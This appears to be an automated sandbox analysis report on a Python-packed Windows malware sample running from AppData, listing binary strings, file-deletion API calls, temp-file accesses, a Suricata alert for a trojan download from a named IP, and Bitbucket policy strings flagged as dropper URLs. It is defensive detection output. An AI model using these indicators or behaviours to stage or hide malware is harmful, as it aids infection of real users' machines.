                        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3799490703.00007FFB029C2000.00000002.00000001.01000000.0000000E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3803291292.00007FFB041BF000.00000002.00000001.01000000.00000022.sdmp, clppth.exe, 00000029.00000003.2059501286.000002C498ACE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02511000.00000002.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3809366779.00007FFB226D1000.00000002.00000001.01000000.00000010.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848674222.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1932878487.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: mgne4i3n.t1d2.exe, 0000001F.00000002.3806869534.00007FFB0B574000.00000002.00000001.01000000.00000017.sdmp, clppth.exe, 0000002A.00000002.3802742975.00007FFB1DED4000.00000002.00000001.01000000.0000002F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3793790170.00007FFB0197C000.00000002.00000001.01000000.0000001D.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1935960901.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3800269232.00007FFB1C3CC000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3793790170.00007FFB0197C000.00000002.00000001.01000000.0000001D.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1935960901.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3800269232.00007FFB1C3CC000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3804653921.00007FFB0B48E000.00000002.00000001.01000000.0000001C.sdmp, clppth.exe, 00000026.00000003.1847327209.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1930590183.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476082957.000002C8869BB000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809691380.00007FFB226F3000.00000002.00000001.01000000.0000000F.sdmp, clppth.exe, 00000026.00000003.1842187984.00000156D218B000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1928851563.000002C498ACA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02479000.00000002.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476082957.000002C8869BB000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809691380.00007FFB226F3000.00000002.00000001.01000000.0000000F.sdmp, clppth.exe, 00000026.00000003.1842187984.00000156D218B000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1928851563.000002C498ACA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_tkinter.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3806016882.00007FFB0B4D8000.00000002.00000001.01000000.00000018.sdmp, clppth.exe, 00000026.00000003.1849282939.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1942221585.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02511000.00000002.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809064972.00007FFB1E3B9000.00000002.00000001.01000000.00000013.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1941486532.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3806753681.00007FFB23AD9000.00000002.00000001.01000000.0000002B.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3806869534.00007FFB0B574000.00000002.00000001.01000000.00000017.sdmp, clppth.exe, 0000002A.00000002.3802742975.00007FFB1DED4000.00000002.00000001.01000000.0000002F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3807780292.00007FFB1BA6D000.00000002.00000001.01000000.00000015.sdmp, clppth.exe, 0000002A.00000002.3805477731.00007FFB23A9D000.00000002.00000001.01000000.0000002D.sdmp
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC85A0 FindFirstFileExW,FindClose,14_2_00007FF741BC85A0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00007FF741BC79B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00007FF741BE0B84
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BC85A0 FindFirstFileExW,FindClose,31_2_00007FF741BC85A0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BC79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,31_2_00007FF741BC79B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00007FF741BE0B84
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B985A0 FindFirstFileExW,FindClose,38_2_00007FF795B985A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,38_2_00007FF795B979B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_00007FF795BB0B84
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B985A0 FindFirstFileExW,FindClose,42_2_00007FF795B985A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,42_2_00007FF795B979B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_00007FF795BB0B84
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user\AppData\Local\Temp\E8C.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user~1\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then jmp 00A74385h11_2_00A74318
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h11_2_00A72CC0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then jmp 00A708AEh11_2_00A70869
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then jmp 00A708AEh11_2_00A70878
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then jmp 00A74385h11_2_00A74307
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then jmp 00A783A3h11_2_00A78368
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then jmp 00A783A3h11_2_00A78359
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h11_2_00A72CB9
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h11_2_00A71EAD
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h11_2_00A71EB8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then jmp 049D5796h11_2_049D5760
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 4x nop then jmp 049D5796h11_2_049D5750

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49711 -> 185.166.143.50:443
                        Potential dropper URLs found in powershell memory
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45949D000.00000004.00000800.00020000.00000000.sdmpString found in memory: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D4594DC000.00000004.00000800.00020000.00000000.sdmpString found in memory: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmpString found in memory: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com 